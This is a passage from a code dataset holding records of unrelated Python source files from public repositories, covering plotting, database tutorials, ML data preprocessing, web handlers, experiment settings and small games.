ncells, 0.1)\n plt.close()\n pressure_ax = field(p_field, SIM_num, ncells, 0.1, \"p\")\n plt.close()\n u_ax = field(u_field, SIM_num, ncells, 0.1, \"x\")\n plt.close()\n v_ax = field(v_field, SIM_num, ncells, 0.1, \"y\")\n plt.close()\n z_ax = field(z_field, SIM_num, ncells, 0.1, \"z\")\n plt.close()\n SIMPLE_convergence(res_SIMPLE, SIM_num)\n plt.close()\n momentum_convergence(resx_momentum, resy_momentum, SIM_num)\n plt.close()\n pressure_convergence(res_pressure, SIM_num)\n","repo_name":"paddywardle/SIMPLE-Based_Steady-State_Solver","sub_path":"plots/plot_script.py","file_name":"plot_script.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70575076889","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nimport json\nfrom bdem import msgutil\n\nimport settings\nfrom eaglet.decorator import param_required\nfrom eaglet.utils.resource_client import Resource\n\nfrom db.mall import models as mall_models\nfrom db.mall import promotion_models\nfrom db.account import models as account_models\nfrom business.account.user_profile import UserProfile\nfrom business import model as business_model\nfrom eaglet.core import watchdog\nfrom eaglet.core.exceptionutil import unicode_full_stack\n\n\n\nfrom business.decorator import cached_context_property\nfrom business.product.property_template.product_template_property import ProductTemplateProperty\nfrom business.mall.corporation_factory import CorporationFactory\n\n\nclass ProductPropertyTemplate(business_model.Model):\n\t\"\"\"\n\t商品属性模板\n\t\"\"\"\n\t__slots__ = (\n\t\t'id',\n\t\t'name',\n\t\t'created_at'\n\t)\n\n\t@staticmethod\n\t@param_required(['model'])\n\tdef from_model(args):\n\t\tmodel = args['model']\n\t\tproperty_template = ProductPropertyTemplate(model)\n\n\t\treturn property_template\n\n\tdef __init__(self, model=None):\n\t\tbusiness_model.Model.__init__(self)\n\n\t\tif model:\n\t\t\tself._init_slot_from_model(model)\n\n\t@property\n\tdef properties(self):\n\t\t\"\"\"\n\t\t获取template中的template_property对象集合\n\t\t\"\"\"\n\t\tmodels = mall_models.TemplateProperty.select().dj_where(template_id=self.id)\n\n\t\ttemplate_properties = []\n\t\tfor property_model in models:\n\t\t\ttemplate_properties.append(ProductTemplateProperty.from_model({\n\t\t\t\t'model': property_model\n\t\t\t}))\n\n\t\treturn template_properties\n\n\tdef update(self, params):\n\t\t\"\"\"\n\t\t更新模板\n\n\t\tArgs:\n title: 属性模板标题\n new_properties: 需要新建的property集合\n update_properties: 需要更新的property集合\n deleted_property_ids: 需要删除的property的id集合\n\t\t\"\"\"\n\t\tcorp = CorporationFactory.get()\n\t\ttemplate_id = self.id\n\n\t\t#更新template name\n\t\tname = params['title']\n\t\tmall_models.ProductPropertyTemplate.update(name=name).dj_where(owner_id=corp.id, id=template_id).execute()\n\n\t\t#更新已存在的template property\n\t\tupdate_properties = params['update_properties']\n\t\tfor template_property in update_properties:\n\t\t\tmall_models.TemplateProperty.update(name=template_property['name'], value=template_property['value']).dj_where(owner_id=corp.id, template_id=template_id, id=template_property['id']).execute()\n\n\t\t#创建新的template property\n\t\tnew_properties = params['new_properties']\n\t\tfor template_property in new_properties:\n\t\t\tmall_models.TemplateProperty.create(\n\t\t\t\towner = corp.id,\n\t\t\t\ttemplate = template_id,\n\t\t\t\tname = template_property['name'],\n\t\t\t\tvalue = template_property['value']\n\t\t\t)\n\n\t\t#删除需要删除的template 
property\n\t\tdeleted_property_ids = params['deleted_property_ids']\n\t\tmall_models.TemplateProperty.delete().dj_where(owner_id=corp.id, template_id=template_id, id__in=deleted_property_ids).execute()\n\n\t@staticmethod\n\tdef create(params):\n\t\tcorp = params['corp']\n\t\tname = params['title']\n\t\tproperties = params['new_properties']\n\n\t\ttemplate = mall_models.ProductPropertyTemplate.create(\n\t\t\towner = corp.id,\n\t\t\tname = name\n\t\t)\n\n\t\tfor template_property in properties:\n\t\t\tmall_models.TemplateProperty.create(\n\t\t\t\towner = corp.id,\n\t\t\t\ttemplate = template,\n\t\t\t\tname = template_property['name'],\n\t\t\t\tvalue = template_property['value']\n\t\t\t)","repo_name":"chengdg/gaia","sub_path":"business/product/property_template/product_property_template.py","file_name":"product_property_template.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25335695735","text":"\"\"\"\nFrom:\nhttps://matplotlib.org/3.1.1/gallery/images_contours_and_fields/image_annotated_heatmap.html\n\nAccessed:\n2020-07-31\n\"\"\"\n\n\"\"\"\n===========================\nCreating annotated heatmaps\n===========================\n\nIt is often desirable to show data which depends on two independent\nvariables as a color coded image plot. This is often referred to as a\nheatmap. If the data is categorical, this would be called a categorical\nheatmap.\nMatplotlib's :meth:`imshow ` function makes\nproduction of such plots particularly easy.\n\nThe following examples show how to create a heatmap with annotations.\nWe will start with an easy example and expand it to be usable as a\nuniversal function.\n\"\"\"\n\n\n##############################################################################\n#\n# A simple categorical heatmap\n# ----------------------------\n#\n# We may start by defining some data. What we need is a 2D list or array\n# which defines the data to color code. We then also need two lists or arrays\n# of categories; of course the number of elements in those lists\n# need to match the data along the respective axes.\n# The heatmap itself is an :meth:`imshow ` plot\n# with the labels set to the categories we have.\n# Note that it is important to set both, the tick locations\n# (:meth:`set_xticks`) as well as the\n# tick labels (:meth:`set_xticklabels`),\n# otherwise they would become out of sync. 
The locations are just\n# the ascending integer numbers, while the ticklabels are the labels to show.\n# Finally we can label the data itself by creating a\n# :class:`~matplotlib.text.Text` within each cell showing the value of\n# that cell.\n\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n# sphinx_gallery_thumbnail_number = 2\n\n\n#############################################################################\n# Using the helper function code style\n# ------------------------------------\n#\n# As discussed in the :ref:`Coding styles `\n# one might want to reuse such code to create some kind of heatmap\n# for different input data and/or on different axes.\n# We create a function that takes the data and the row and column labels as\n# input, and allows arguments that are used to customize the plot\n#\n# Here, in addition to the above we also want to create a colorbar and\n# position the labels above of the heatmap instead of below it.\n# The annotations shall get different colors depending on a threshold\n# for better contrast against the pixel color.\n# Finally, we turn the surrounding axes spines off and create\n# a grid of white lines to separate the cells.\n\n\ndef heatmap(data, row_labels=None, col_labels=None, ax=None,\n cbar_kw={}, cbarlabel=\"\", **kwargs):\n \"\"\"\n Create a heatmap from a numpy array and two lists of labels.\n\n Parameters\n ----------\n data\n A 2D numpy array of shape (N, M).\n row_labels\n A list or array of length N with the labels for the rows.\n col_labels\n A list or array of length M with the labels for the columns.\n ax\n A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If\n not provided, use current axes or create a new one. Optional.\n cbar_kw\n A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.\n cbarlabel\n The label for the colorbar. Optional.\n **kwargs\n All other arguments are forwarded to `imshow`.\n \"\"\"\n\n if not ax:\n ax = plt.gca()\n\n # Plot the heatmap\n im = ax.imshow(data, **kwargs)\n\n # Create colorbar\n cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)\n cbar.ax.set_ylabel(cbarlabel, rotation=-90, va=\"bottom\")\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(data.shape[1]))\n ax.set_yticks(np.arange(data.shape[0]))\n # ... and label them with the respective list entries.\n \n if col_labels is not None:\n ax.set_xticklabels(col_labels)\n else:\n ax.get_xaxis().set_ticks([])\n if row_labels is not None:\n ax.set_yticklabels(row_labels)\n else:\n ax.get_yaxis().set_ticks([])\n\n # Let the horizontal axes labeling appear on top.\n ax.tick_params(top=True, bottom=False,\n labeltop=True, labelbottom=False)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=-30, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Turn spines off and create white grid.\n for edge, spine in ax.spines.items():\n spine.set_visible(False)\n\n ax.set_xticks(np.arange(data.shape[1]+1)-.5, minor=True)\n ax.set_yticks(np.arange(data.shape[0]+1)-.5, minor=True)\n ax.grid(which=\"minor\", color=\"w\", linestyle='-', linewidth=3)\n ax.tick_params(which=\"minor\", bottom=False, left=False)\n\n return im, cbar\n\n\ndef annotate_heatmap(im, data=None, valfmt=\"{x:.2f}\",\n textcolors=[\"black\", \"white\"],\n threshold=None, **textkw):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. 
Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A list or array of two color specifications. The first is used for\n values below a threshold, the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max())/2.\n\n # Set default alignment to center, but allow it to be\n # overwritten by textkw.\n kw = dict(horizontalalignment=\"center\",\n verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n texts = []\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])\n text = im.axes.text(j, i, valfmt(data[i, j], None), **kw)\n texts.append(text)\n\n return texts","repo_name":"petermattia/revisit-severson-et-al","sub_path":"image_annotated_heatmap.py","file_name":"image_annotated_heatmap.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"74665337048","text":"#conding:utf-8\nfrom pymongo import MongoClient\n#建立客户端\nclient = MongoClient('10.58.69.41:27017')\n#连接数据库\ndb = client.nerData\n#删除集合 db.collection.drop()\n\n\n#连接表名 如果不存在,会自动创建\ncollection = db.Test\n#catid = fircat + \"_\" + seccat + \"_\" + thrcat+\"_\"+firid+\"_\"+thrCatid;\n#展示所有数据库\nprint(db.dbs)\n\n#插入\n#collection.insert({\"name\":\"菜鸟\"})\n#删除 数据库\n#db.dropDatabase()\n#遍历所有条数\n#for product in collection.find():\n#更新 update()\n\ncollection.update({'name':'菜鸟'},{'name':'MongoDB'})\n\n\n#删除文档\ncollection.insert({\"title\": 'MongoDB 教程',\n \"description\": 'MongoDB 是一个 Nosql 数据库',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['mongodb', 'database', 'NoSQL'],\n \"likes\": 100\n })\n\ncollection.remove({'title':'MongoDB 教程'})\n\n#查询文档\n'''\nMongoDB 查询文档使用find() 方法 以非结构的方法来显示所有文档\ndb.collection.find(query,projection)\nquery 可选,使用查询操作符指定查询条件 \nprojection 可选\n如果你需要以易读的方式来读取数据,可以使用pretty()方法\n\ndb.col.find().pretty()\n\n\n'''\nprint(dir(collection))\nprint(collection.find_one())\n\n\n'''\nMongoDB 中的条件 查询\n等于 {:}\n小于\t{:{$lt:}}\t db.col.find({\"likes\":{$lt:50}}).pretty()\t\n小于或等于\t{:{$lte:}}\t db.col.find({\"likes\":{$lte:50}}).pretty()\t\n大于\t{:{$gt:}}\t db.col.find({\"likes\":{$gt:50}}).pretty()\t\n大于或等于\t{:{$gte:}}\t db.col.find({\"likes\":{$gte:50}}).pretty()\t\n不等于\t{:{$ne:}}\t db.col.find({\"likes\":{$ne:50}}).pretty()\n'''\n#不加 list 返回的是 游标,而不是 具体的数据\nprint(list(collection.find({\"firstCatId\" : \"cat31665542\"})))\n\n\n# MongoDB 条件操作符\n'''\n大于 $gt $lt $ gte $lte \n为了使用方便,我们可以先使用一下命令清空集合\n'''\ncollection.remove({})\n#插入一下数据\ncollection.insert({\n \"title\": 'PHP 教程',\n \"description\": 'PHP 是一种创建动态交互性站点的强有力的服务器端脚本语言。',\n \"by\": '菜鸟教程',\n 
\"url\": 'http://www.runoob.com',\n \"tags\": ['php'],\n \"likes\": 200\n})\n\ncollection.insert({\n \"title\": 'Java 教程',\n \"description\": 'Java 是由Sun Microsystems公司于1995年5月推出的高级程序设计语言。',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['java'],\n \"likes\": 150\n })\n\ncollection.insert({\n \"title\": 'MongoDB 教程',\n \"description\": 'MongoDB 是一个 Nosql 数据库',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['mongodb'],\n \"likes\": 100\n })\n\nprint( list(collection.find( {\"likes\":{\"$gt\" : 100}} )) )\n#联合查询\nprint( list(collection.find( {\"likes\":{\"$gt\" : 100,\"$lt\" : 200}} )) )\n\n#MongoDB $type 操作符\n\n#如果想获取 \"col\" 集合中 title 为 String 的数据,你可以使用以下命令:\ncollection.find({\"title\" : {\"$type\" : 2}})\n\n#MongoDB 中读取指定数量的数据记录,可以使用MongoDB 的 limit方法,\nprint(\"limit \",list(collection.find().limit(1)))\n\n#MongoDB sort() 方法 sort() 方法可以通过参数指定排序的字段,并使用 1 和 -1 来指定排序的方式\n#其中1 为升序,-1 位降序\n\nprint(\"sort:\",list(collection.find().sort('likes',-1)))\n\n\n###MongoDB 索引 索引通常能够极大的提高查询的效率,如果没有索引,MongoDB在读取数据时必须扫描集中中每个文件并选取那些\n#符合查询条件的记录是非常耗时的\n#索引是特殊的数据结构,索引存储在一个易于遍历读取的数据集合中,索引是对数据库表中一列或多列的值 进行排序的一种结构\n\n# create_index() 方法来创建索引 1为指定按升序创建索引,如果你想按降序来创建索引指定为-1即可。\n#之前的老方法 ensureindex() 已经不用了\ncollection.create_index([(\"likes\",1)])\n\n#mongoDB 聚合 (aggregate)\n\n\n\n\n\n\n\n","repo_name":"LawLietzh/workspacePy","sub_path":"py/py_tool/pythonMongo/LianxiMongo.py","file_name":"LianxiMongo.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18706516138","text":"import os\nfrom unittest import TestCase\nfrom stdf_utils import OpenFile, StdfRecord\n\n\nclass TestStdfRecord(TestCase):\n def setUp(self) -> None:\n self.f = os.path.abspath(os.path.join(__file__, os.pardir, \"data\", \"lot3.stdf.gz\"))\n\n def test_stdf_record_open_file(self):\n with OpenFile(self.f) as f_in:\n for i, (rec_type, record) in enumerate(StdfRecord(f_in)):\n print(i, rec_type, record)\n if i > 100:\n break\n\n","repo_name":"peterjcwu/stdf-utils","sub_path":"tests/test_stdf_record.py","file_name":"test_stdf_record.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6193881780","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articles', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='articulo',\n name='imagen_destacada',\n field=models.ImageField(default='default.jpg', upload_to='main_pics/'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='articulo',\n name='estado',\n field=models.CharField(default='p', choices=[('b', 'borrador'), ('p', 'publicado')], max_length=1),\n ),\n migrations.AlterField(\n model_name='categoria',\n name='slug',\n field=models.SlugField(blank=True, null=True, editable=False),\n ),\n ]\n","repo_name":"pythoncali/django_cali","sub_path":"articles/migrations/0002_auto_20150526_1438.py","file_name":"0002_auto_20150526_1438.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38785994234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 22 14:30:09 2018\r\n\r\n@author: 
keen_liu\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\n但是,如果要部署到服务器时,通常需要修改数据库的host等信息,直接修改config_default.py不是一个好办法,\r\n更好的方法是编写一个config_override.py,用来覆盖某些默认设置:\r\n\r\n\"\"\"\r\n\r\nconfigs = {\r\n 'db': {\r\n 'host': '127.0.0.1' #改为服务器地址\r\n }\r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"keennnn/webapp_keen","sub_path":"www/config_override.py","file_name":"config_override.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30094111964","text":"from os import environ\n\n# if you set a property in SESSION_CONFIG_DEFAULTS, it will be inherited by all configs\n# in SESSION_CONFIGS, except those that explicitly override it.\n# the session config can be accessed from methods in your apps as self.session.config,\n# e.g. self.session.config['participation_fee']\n\nSESSION_CONFIG_DEFAULTS = {\n 'real_world_currency_per_point': 1,\n 'participation_fee': 0,\n 'doc': \"\",\n}\n\nSESSION_CONFIGS = [\n {\n 'name': 'FHM',\n 'display_name': \"FHM\",\n 'num_demo_participants': 2,\n 'app_sequence': ['hausladen_FHM']\n },\n]\n\n\nLANGUAGE_CODE = 'de'\nREAL_WORLD_CURRENCY_CODE = 'EUR'\nUSE_POINTS = False\n\nROOMS = [\n dict(\n name='Xlab',\n display_name='Xlab@FUB',\n participant_label_file='Xlab.txt'\n ),\n]\n\nADMIN_USERNAME = 'admin'\nADMIN_PASSWORD = environ.get('OTREE_ADMIN_PASSWORD')\nDEMO_PAGE_INTRO_HTML = \"\"\" \"\"\"\n\nSECRET_KEY = '=s#7s$6+9hrhhsh+x$#u_awkkic$m_h@6g0duap!j%))xsmjr*'\n\n# if an app is included in SESSION_CONFIGS, you don't need to list it here\nINSTALLED_APPS = ['otree']\n","repo_name":"carinahausladen/PredictingCompliance","sub_path":"oTree_Experiment/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9765104086","text":"import random\n\nfrom honty_mall.door import Door\nfrom honty_mall.terminal_service import TerminalService\n\nclass Stage():\n \"\"\"\n The stage class presents 3 doors and contains actions performed under the direction of the director. Utilizes three doors and terminal service.\n\n self._terminal_service: The service that collects input and prints to the console.\n self._doors: A list containing 3 doors.\n self._chosen_door: A number [1,2,3] used to determine the first door selected.\n self._stay_or_switch: Input from the user ('s' or a number [1,2,3]) containing their second decision.\n self._remaining_doors: (comes later) A list containing the two doors that were not selected in the first decision.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n The Constructor method for the Stage class.\n\n self: The Stage class.\n \"\"\"\n\n self._terminal_service = TerminalService()\n self._doors = [Door(), Door(), Door()]\n self._stay_or_switch = False\n \n # Set indeces for the doors that makes sense to the player [1,2,3]\n i = 1\n for door in self._doors:\n door.set_index(i)\n i += 1\n \n # Place a car behind one of the doors\n special_door = random.choice(range(3))\n self._doors[special_door].set_as_surprise()\n\n def present_stage(self):\n \"\"\"\n Calls all doors to show themselves to the player\n\n self: The Stage class.\n \"\"\"\n\n for door in self._doors:\n door.present()\n \n def choose_door(self, index):\n \"\"\"\n Chooses a door not to open yet. 
Opens another door that does not reveal the car.\n\n self: The Stage class.\n index: An integer [1,2,3] that the player selected to represent their chosen door.\n \"\"\"\n \n # Set self._remaining_doors to be the two doors that were not chosen\n self._remaining_doors = self._doors[:index - 1] + self._doors[index:]\n \n # choose one of the other doors\n door_to_maybe_open = random.choice(self._remaining_doors)\n \n # check to see if the car is behind that door\n if door_to_maybe_open.check_if_surprise():\n\n # if so, choose the other door and open it\n list(set(self._remaining_doors) - set([door_to_maybe_open]))[0].open()\n \n # if not, open the door\n elif door_to_maybe_open.check_if_surprise() == False:\n door_to_maybe_open.open()\n \n def make_it_or_break_it(self, index):\n \"\"\"\n The action that determines the second and final choice of the player: should they open the door they chose or switch to open the other remaining closed door? Possible answers are an integer [1,2,3] that matches their chosen door, or the letter 's' to represent 'switch'.\n\n self: The Stage class.\n index: The integer [1,2,3] player-friendly index that represents their first chosen door, which is still closed.\n \"\"\"\n \n self._stay_or_switch = self._terminal_service.to_switch_or_not_to_switch(f\"You chose door {index}. Do you think you chose the correct door, or would you like to switch?\\nEnter '{index}' to stick with door #{index}, or 's' to switch doors: \", index)\n \n # If they chose to stay with the same door, open it\n if self._stay_or_switch == str(index):\n self._doors[index - 1].open()\n \n # Otherwise, if they chose to switch to the other closed door,\n # find the other closed door and open that one\n elif self._stay_or_switch.lower() == 's':\n if self._remaining_doors[0].check_if_open():\n self._remaining_doors[1].open()\n elif self._remaining_doors[1].check_if_open():\n self._remaining_doors[0].open()\n","repo_name":"chigham/cse210-06","sub_path":"honty_mall/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19639994727","text":"\"\"\"benchmark\"\"\"\nimport os\nimport glob\nfrom data.srdata import SRData\n\n\nclass Benchmark(SRData):\n \"\"\"DIV2K\"\"\"\n def __init__(self, args, name='Set5', train=False):\n super(Benchmark, self).__init__(args, name=name, train=train)\n self.dir_hr = None\n self.dir_lr = None\n\n def _scan(self):\n \"\"\"srdata\"\"\"\n names_hr = sorted(\n glob.glob(os.path.join(self.dir_hr, '*' + self.ext[0])))#glob 查找文件路径,将所有HR文件的图像名进行排序\n names_lr = [[] for _ in self.scale]\n for f in names_hr:\n filename, _ = os.path.splitext(os.path.basename(f))#basename - 返回最后一部分\n for si, s in enumerate(self.scale): #enumberate 构成索引序列 0 - a\n if s != 1:\n scale = s\n names_lr[si].append(os.path.join(self.dir_lr, 'X{}/{}{}' \\\n .format(s, filename, self.ext[1])))#文件地址 X2/1x2.img\n for si, s in enumerate(self.scale):\n if s == 1:\n names_lr[si] = names_hr\n return names_hr, names_lr\n\n\n def _set_filesystem(self, dir_data):\n self.apath = os.path.join(dir_data, 'benchmark', self.args.data_test[0])\n self.dir_hr = os.path.join(self.apath, 'HR')\n self.dir_lr = os.path.join(self.apath, 'LR')\n self.ext = ('.png', 
    def _set_filesystem(self, dir_data):\n        self.apath = os.path.join(dir_data, 'benchmark', self.args.data_test[0])\n        self.dir_hr = os.path.join(self.apath, 'HR')\n        self.dir_lr = os.path.join(self.apath, 'LR')\n        self.ext = ('.png', '.png')","repo_name":"dmcv-ecnu/MindSpore_ModelZoo","sub_path":"LatticeNet/data/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"10440797118","text":"from http.server import BaseHTTPRequestHandler\nfrom urllib import parse\nimport requests\n\nclass handler(BaseHTTPRequestHandler):\n    \n    def do_GET(self): \n        url_path = self.path \n        url_components = parse.urlsplit(url_path) \n        query_string_list = parse.parse_qsl(url_components.query) \n        dic = dict(query_string_list) \n        \n        if \"number\" in dic: \n            url = 'http://numbersapi.com/'\n            url = url + dic['number'] + \"?json\"\n\n            print(url)\n            req = requests.get(url)\n            \n            print(req, \"a small string\")\n\n            # the \"?json\" suffix makes the API return JSON instead of plain text\n            data = req.json()\n            \n            if data.get('text'):\n                fact = data.get('text')\n                actual_number = data.get('number')\n\n                message = str(f\"\"\"\n                {actual_number}\n                Did you know: {fact} \n\n                Refresh to get another random fact about {actual_number}\n                \"\"\") \n        else: \n            message = \"PLEASE PICK A NUMBER.\" \n\n        self.send_response(200)\n        self.send_header('Content-type', 'text/plain')\n        # self.send_header('Content-type', 'application/json')\n        self.end_headers() \n\n        self.wfile.write(message.encode())\n        return \n\n\nif __name__ == \"__main__\":\n\n    # note: BaseHTTPRequestHandler is normally driven by an HTTPServer;\n    # instantiating it directly like this will not work outside a server\n    anything = handler() \n    anything.do_GET()\n","repo_name":"bioncabond/serverless","sub_path":"api/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74319646809","text":"r\"\"\"Convert refexp data to the common Pix2Struct format.\n\"\"\"\nimport logging\nimport os\nimport random\nfrom typing import Iterable\n\nfrom absl import app\nfrom absl import flags\nimport apache_beam as beam\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom pix2struct.preprocessing import preprocessing_utils\nimport tensorflow as tf\n\nflags.DEFINE_string(\"data_dir\", None, \"Directory containing the refexp data.\")\n\nflags.DEFINE_string(\n    \"image_dir\",\n    None,\n    \"Directory containing the images referenced in refexp data.\")\n\nflags.DEFINE_integer(\n    \"num_negative_samples\",\n    5,\n    \"Number of negative samples per instance.\")\n\n\nclass ProcessSplit(beam.PTransform):\n  \"\"\"Process split.\"\"\"\n\n  def __init__(self, split: str):\n    self._split = split\n    self._data_dir = flags.FLAGS.data_dir\n    self._image_dir = flags.FLAGS.image_dir\n\n  def get_image(self, image_id):\n    filename = image_id + \".jpg\"\n    with tf.io.gfile.GFile(os.path.join(self._image_dir, filename), \"rb\") as f:\n      return Image.open(f)\n\n  def draw_bounding_box(self, image, candidate_idx, example):\n    def _get_coordinate(key, max_value):\n      float_val = example.features.feature[key].float_list.value[candidate_idx]\n      return round(float_val * max_value)\n    image_dims = np.asarray(image).shape\n    xmin = _get_coordinate(\"image/object/bbox/xmin\", image_dims[1])\n    xmax = _get_coordinate(\"image/object/bbox/xmax\", image_dims[1])\n    ymin = _get_coordinate(\"image/object/bbox/ymin\", image_dims[0])\n    ymax = _get_coordinate(\"image/object/bbox/ymax\", image_dims[0])\n    img_draw = ImageDraw.Draw(image, \"RGBA\")\n    img_draw.rectangle(\n        xy=((xmin, ymax),\n            (xmax, ymin)),\n        fill=(0, 0, 255, 0),\n        outline=(0, 0, 255, 255))\n    return image\n\n  def convert_to_tf_examples(self, record_id, record\n                             ) -> Iterable[tf.train.Example]:\n    
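# Added walkthrough comment: each input is a (unique id, serialized tf.train.Example)\n    # pair produced by dataset.enumerate(); we decode it, draw one candidate box per copy\n    # of the image, render the query as a header, and yield a true/false example per candidate.\n    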
raw_example = tf.train.Example().FromString(record.numpy())\n record_id = record_id.numpy().item()\n try:\n label = preprocessing_utils.get_int_feature(raw_example,\n \"image/ref_exp/label\")\n num_candidates = int(\n preprocessing_utils.get_float_feature(raw_example,\n \"image/object/num\"))\n query = preprocessing_utils.get_text_feature(raw_example,\n \"image/ref_exp/text\")\n image_id = preprocessing_utils.get_text_feature(raw_example, \"image/id\")\n image = self.get_image(image_id)\n except (IndexError, tf.errors.NotFoundError):\n return\n\n if flags.FLAGS.num_negative_samples and self._split == \"train\":\n num_negative_samples = flags.FLAGS.num_negative_samples\n else:\n num_negative_samples = num_candidates\n\n candidates = list(cand for cand in range(num_candidates) if cand != label)\n random.shuffle(candidates)\n candidates = candidates[:num_negative_samples] + [label]\n for candidate_idx in candidates:\n tf_example = tf.train.Example()\n candidate_image = image.copy()\n candidate_image = self.draw_bounding_box(candidate_image, candidate_idx,\n raw_example)\n candidate_image = preprocessing_utils.render_header(\n candidate_image, query)\n is_correct = label == candidate_idx\n # pix2struct features\n preprocessing_utils.add_bytes_feature(\n tf_example, \"image\",\n preprocessing_utils.image_to_bytes(candidate_image))\n preprocessing_utils.add_text_feature(\n tf_example, \"parse\", str(is_correct).lower())\n preprocessing_utils.add_text_feature(\n tf_example, \"id\", str(f\"{record_id}_{candidate_idx}\"))\n # pix2box features\n preprocessing_utils.add_text_feature(\n tf_example, \"group_id\", str(record_id))\n preprocessing_utils.add_text_feature(\n tf_example, \"candidate_id\", str(candidate_idx))\n yield tf_example\n\n def expand(self, root):\n data_path = os.path.join(\n self._data_dir, f\"{self._split}.tfrecord\")\n raw_dataset = tf.data.TFRecordDataset([data_path])\n # get a unique id per record\n raw_dataset = raw_dataset.enumerate(start=0)\n output_path = os.path.join(\n self._data_dir, \"processed\", f\"{self._split}.tfr\")\n\n return (root\n | \"Create\" >> beam.Create(raw_dataset)\n | \"Convert\" >> beam.FlatMapTuple(self.convert_to_tf_examples)\n | \"Shuffle\" >> beam.Reshuffle()\n | \"Write\" >> beam.io.WriteToTFRecord(\n output_path,\n coder=beam.coders.ProtoCoder(tf.train.Example)))\n\n\ndef pipeline(root):\n _ = (root | \"ProcessTrain\" >> ProcessSplit(\"train\"))\n _ = (root | \"ProcessVal\" >> ProcessSplit(\"val\"))\n _ = (root | \"ProcessTest\" >> ProcessSplit(\"test\"))\n\n\ndef main(argv):\n with beam.Pipeline(\n options=beam.options.pipeline_options.PipelineOptions(argv[1:])) as root:\n pipeline(root)\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n flags.mark_flag_as_required(\"data_dir\")\n flags.mark_flag_as_required(\"image_dir\")\n app.run(main)\n","repo_name":"google-research/pix2struct","sub_path":"pix2struct/preprocessing/convert_refexp.py","file_name":"convert_refexp.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"31"} +{"seq_id":"75033388888","text":"import random\nimport sys\nimport pygame\n\nclass Particle:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.size = random.randint(5, 20)\n self.color = (200, 200, 200)\n\n def move(self):\n self.x += random.randint(-1, 1)\n self.y += random.randint(-1, 1)\n\n def draw(self, screen):\n pygame.draw.circle(screen, self.color, (self.x, self.y), self.size)\n\nclass 
